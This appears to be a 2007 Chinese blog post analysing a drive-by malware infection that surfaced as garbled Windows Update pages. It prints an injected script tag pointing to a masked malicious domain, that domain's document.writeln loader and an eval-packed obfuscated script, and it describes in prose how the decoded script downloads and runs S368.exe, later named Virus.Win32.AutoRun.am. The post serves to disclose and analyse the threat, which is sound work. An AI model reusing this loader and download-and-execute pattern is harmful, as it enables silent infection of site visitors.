Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.am

endurer 原创
2007-07-11 第1

今早打开电脑,发现有Windows更新,自动更新速度有点慢,于是手动打开http://www.windowsupdate.com/,不料看到的是一堆乱码~

选择开始菜单中的“Windows Update”,打开 http://windowsupdate.microsoft.com/,显示与http://www.windowsupdate.com/ 相同。

检查IP地址。

D:/pe/test>ping www.windowsupdate.com

Pinging windowsupdate.microsoft.nsatc.net [207.46.225.221] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.

Ping statistics for 207.46.225.221:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

[查询结果] 您的查询: [ip地址] 207.46.225.221 => 207.46.225.221
·本站主数据: 美国 华盛顿州 雷德蒙市 Microsoft微软公司
·本站辅数据: 还没人提交数据
·参考数据一: 美国 Microsoft公司
·参考数据二: 美国
[查询提供] www.123cha.com

D:/pe/test>ping windowsupdate.microsoft.com

Pinging windowsupdate.microsoft.nsatc.net [207.46.18.94] with 32 bytes of data:

Request timed out.
Request timed out.
Request timed out.
Request timed out.

Ping statistics for 207.46.18.94:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

[查询结果] 您的查询: [ip地址] 207.46.18.94 => 207.46.18.94
·本站主数据: 美国 华盛顿州 雷德蒙市 Microsoft微软公司
·本站辅数据: 还没人提交数据
·参考数据一: 美国 Microsoft公司
·参考数据二: 美国

IP地址是正常的。

查看网页源代码,如下:
/---
<script src=hxxp://c***k*1*.in/N**.JS></script> 刉mo??`釥}T蒊[琺lo 晇蹢倴?娫H蕩wまщH馑蓠罟鐜勿,辜餷6}/g?螔溷速蹴Q瘃|簒y翓(榐蛽?={頦彚#rk索q驾n#mX)綆5砛fp宥 E?
?倹興蔭蚢R犳)??
?窪鹻罶瓕Z賵?叙/ =z ^紉謞+Y仯 C搄^Z甦@K?G竘嵙g.3?p[f?L? 営j蒙
?K^?羆Z砚V蜐??dM
?Zc2IgLg^蚝b耏 $狴绯雼愥啩dCs
蘩Ji丞Jw邯?H0;c别G淪`?傎})?鐥殑QG? w港*潤=4兜?0忿?6玜v?迈?剴?o>n搗彂貸莹G ?觸?hA闓R恝?=栟=湋X鸟`0鸪慊~褫?藿!?f魀!PJ^a[?@:?K彇22遣侹n,岑H繰(R缔浙
#?|ㄨ8J?]6晲斆%N?V?妘YP?J?W趵鵎洶闱<佔褷媇趎Th!p?{刄;?荆2鞵璆P長"%量畑F~藤昄?)#€?糘s&篆 =渵苦k蚛q頨笺v?EI酟T鍨|T伌閹堋鰀O螕嬞蕒鹽'Xw?+鼎邙?琟t?,】p]`疦H#畐O:?訕阼?汽猶踀鏦?撍賐鼦?g?f`l羔嚠S?謻6販Y*つ*?搐4LR??G烤>賑k?A箶P諄-塙璘託m
?
鲫荞?uZt^zN囔fv:j僔7箠9 ?!闷?椌軩酶?h1?樃耖1鹴2潔侽?&Y?M螾l蠻!?简D(;禂祝'鷞;€K)_?
Go茋黳c嗥钎む壡DnC?礿睷妁i/噯5諴蔢W?曛祷涫妸.r?[?r[4m栖d?器v?」卿谘#闫1卷狒諑jb? 襾卻}涹4o;
安;x熨R忛=乗悛K沔u凿?=?守U駎駾姌)唱溟h饠鍓T濍#?侭@?颭|.?壌A卤d踞r湼"镰擃n?虝?# k射?,7f]鶋/z._ 懀靵,?璠濠`s?Ь)夛I唛*徂倧楐?N稭腥昊?
炥9閚飱@S?F瞪i?l衮懱~?8?蔘銮(?錠?66?T/?擰=|臩擤餽Ku?^??z諘Bm]趏o. 0?勛萈k▆箅@v?? + 8{
U?S(?
臅??|?艄瞮卩?4HD偋?sn簧cW[|??枙礘7畟賀`z姵詚緑块?i魙c:??钝韛{P歕甌湒;妥箥r[`橿?}豹秣E犉栎t?U孱巌
9U篢醐罝?
h糍?HP频籟遇蟖<G?拮竪晦t凖?7n?
---/

D:/test>ping c***k*1*.in

Pinging c***k*1*.in [209.11.243.35] with 32 bytes of data:

Reply from 209.11.243.35: bytes=32 time=479ms TTL=116
Reply from 209.11.243.35: bytes=32 time=411ms TTL=116
Reply from 209.11.243.35: bytes=32 time=375ms TTL=116
Request timed out.

Ping statistics for 209.11.243.35:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 375ms, Maximum = 479ms, Average = 316ms

您的查询: [ip地址] 209.11.243.35 => 209.11.243.35
·本站主数据: 美国
·本站辅数据: 还没人提交数据
·参考数据一: 美国
·参考数据二: 美国

hxxp://c***k*1*.in/N**.JS 源代码:
/---
document.writeln("<script src=/"hxxp:c***k*1*//S368//NewJs**2.js/"><//script>");
document.writeln("<script>");
document.writeln("function Start(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = /"Cookie1=/" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = /"Cookie1=POPWINDOS;expires=/"+ Then.toGMTString() ");
document.writeln("");
document.writeln("}");
document.writeln("}");
document.writeln("Start();");
document.writeln("<//script>")
---/

hxxp://c***k*1*.in/S368/NewJs**2.js 是使用eval()执行加密的代码:
/---
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p}('1a("//i//g//e//h//j//2…(略)…|x2A|eval'.split('|'),0,{}))
---/

经过3次解密,得到原始代码。功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 S368.exe,保存到%windir%,文件名由自定义函数:

/---
function GnMs(n)
{
var numberMs = Math.random()*n;
return '~Temp'+Math.round(numberMs)+'.tmp';
---/

生成,即 ~Temp****.exe,其中****为 数字。然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令: %windir%/system32/cmd.exe /c %windir%/~Temp****.exe 来运行。

文件说明符 : D:/test/S368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-11 8:39:29
修改时间 : 2007-7-11 8:39:29
访问时间 : 2007-7-11 8:40:0
大小 : 23087 字节 22.559 KB
MD5 : a0795ad6df991d65b38968ced427f09b
EXEStealth 2.0 - 2.4 -> WebtoolMaster

主 题: RE:S368.exe[KLAB-2419187]
发件人: "" <newvirus@kaspersky.com> <script language="JavaScript" type="text/javascript"> <!-- var aAddAdress = document.getElementById("aAddAdress"); aAddAdress.href = document.guideform.guidelinks.options[5].value; var aDeleteAdress = document.getElementById("aDeleteAdress"); aDeleteAdress.href = document.guideform.guidelinks.options[4].value; document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[5]); document.guideform.guidelinks.removeChild(document.guideform.guidelinks.options[4]); //--> </script> 发送时间:2007-07-11 13:58:48

S368.exey - Virus.Win32.AutoRun.am

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.
--
Best regards, Boris Yampolsky

Virus analyst, Kaspersky Lab.

e-mail: newvirus@kaspersky.com

http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.

http://www.kaspersky.com/helpdesk.html - technical support.

刚才又下载了检查,发现文件的MD5值变了:

文件说明符 : D:/test/s368.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-7-11 19:43:49
修改时间 : 2007-7-11 19:43:50
访问时间 : 2007-7-11 19:46:2
大小 : 23087 字节 22.559 KB
MD5 : e277b83f3eedac59ec0077bb981e4082

Windows更新网站被黑还是被ARP病毒捉弄了?Virus.Win32.AutoRun.am相关推荐

  1. 【强烈推荐】Windows 更新疑难解答(转贴)

    转自: http://www.cfanclub.net/new_dnzs/040203002.htm 作者:闻道长安 原文如下: 首先声明:这篇东东是我一个朋友Watter翻译的,国内只有个别论坛才有 ...

  2. dell电脑更新win11后黑屏但有鼠标(已解决)

    这个问题相信是困扰很多dell用户所困扰的问题,网上的方法都是 ctrl+shift+del 我试过根本没有用. 直到我发现dell官方的通告:升级到 Windows 11 后,Vostro 成就 5 ...

  3. 如何防止网站被黑客入侵,避免网站被黑的防御方法

    如果客户的企业网站被攻击了怎么办,因为做网站建设的朋友或者在维护网站的朋友都应该知道,有很多企业网站会经常被植入木马或是被黑客攻击,造成我们的网站打不开,或是打开后进入的不是我们公司自己的网站,而是链 ...

  4. **官网被黑、网站被黑后和网站被入侵更好的处理解决办法

    2018.6.19当天接到一位新客户反映自己的网站被黑了,网站首页也被黑客篡改了,网站首页被加了一些与网站不相符的内容与加密的代码,导致百度网址安全中心提醒您:该页面可能存在木马病毒!网站在百度的收录 ...

  5. **网站被黑后和官网被入侵更好的处理解决办法

    2011年11月11日,Valve Software总裁加布·纽维尔bai向Steam的用户发du送了一篇通知,承认黑客大zhi规模攻击了daoSteam论坛,而且受zhuan到攻击的论坛数据库中,包 ...

  6. windows 更新服务器搭建

    转载:http://yuanyeqq.spaces.live.com/blog/cns!7F1C3C2FBD13154D!111.entry?_c11_blogpart_blogpart=blogvi ...

  7. 用SCCM2007 R2管理Windows更新,SCCM系列之六

    用SCCM2007 R2管理Windows更新<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:off ...

  8. windows服务器网站日志,windows服务器网站日志文件

    windows服务器网站日志文件 内容精选 换一换 华为云帮助中心,为用户提供产品简介.价格说明.购买指南.用户指南.API参考.最佳实践.常见问题.视频帮助等技术文档,帮助您快速上手使用华为云服务. ...

  9. Windows更新补丁下载、批量安装的几种方法

    Windows更新补丁下载.批量安装的几种方法 对于广大电脑爱好者而言,打补丁已经是"家常便饭".每次重装系统后,之前系统更新过的补丁也随之毁于一旦,不得不再次连接到微软的网站,将 ...

最新文章

  1. Vim 用户的大脑变化
  2. 垂直梯形校正画质损失多少_投影仪梯形校正会影响画质吗?投影仪梯形校正调不正怎么办?...
  3. 信息系统项目管理师论文范文-风险管理
  4. 李开复:人工智能行业发展与投资趋势
  5. 虚拟跳线软件干什么用的_跳线的作用
  6. php ztree异步加载数据格式,zTree异步加载简单demo
  7. 文件md5码怎么生成_Linux 系统文件校验方法--MD5,SHA1,PGP,SHA256,SHA512
  8. 5G格局剧变!苹果高通和解,英特尔退票出局,华为独善其身
  9. 「深度」5G,真的有必要在2020年占领我们吗?
  10. 迅雷远程服务器连接失败是什么原因,迅雷远程页面常见错误码及处理.docx
  11. 昆仑通态复制的程序可以用吗_第478期丨相同功能带定时器的PLC程序怎么简化?非标设备出口到日本,应该怎么配电。...
  12. 数据统计分析(SPSS)【8】
  13. 顶级 Vue.js 开发工具
  14. java实现选择排序(思路与实现)
  15. 教你快速开发一个 狼人杀微信小程序(附源码)
  16. 在新的一年,真心祝愿朋友平安幸福快乐安康!-间歇博客
  17. http 304响应的理解
  18. IndexedDB 实践
  19. 如何取消系统“嘟”的蜂鸣声(报警声)
  20. NSDNA:神经系统疾病相关的ncRNA数据库

热门文章

  1. (debug)vue-pdf预览时公式里的英文乱码
  2. DP动态规划--最大子段和问题
  3. java基于springboot +vue的图书馆图书借阅系统
  4. Dell r710安装esxi 黑群晖DS3615xs 解决无法分配ip、系统重复还原、端口无法更改的问题
  5. 虚电路(Virtual Circuit)的概念
  6. SecureCRT Linux中文乱码问题
  7. linux 烧写光盘iso
  8. 加固类计算机,关于我国计算机加固方面的标准
  9. 手机java短片_多媒体、JAVA游戏
  10. 不正常关机引起的数据库置疑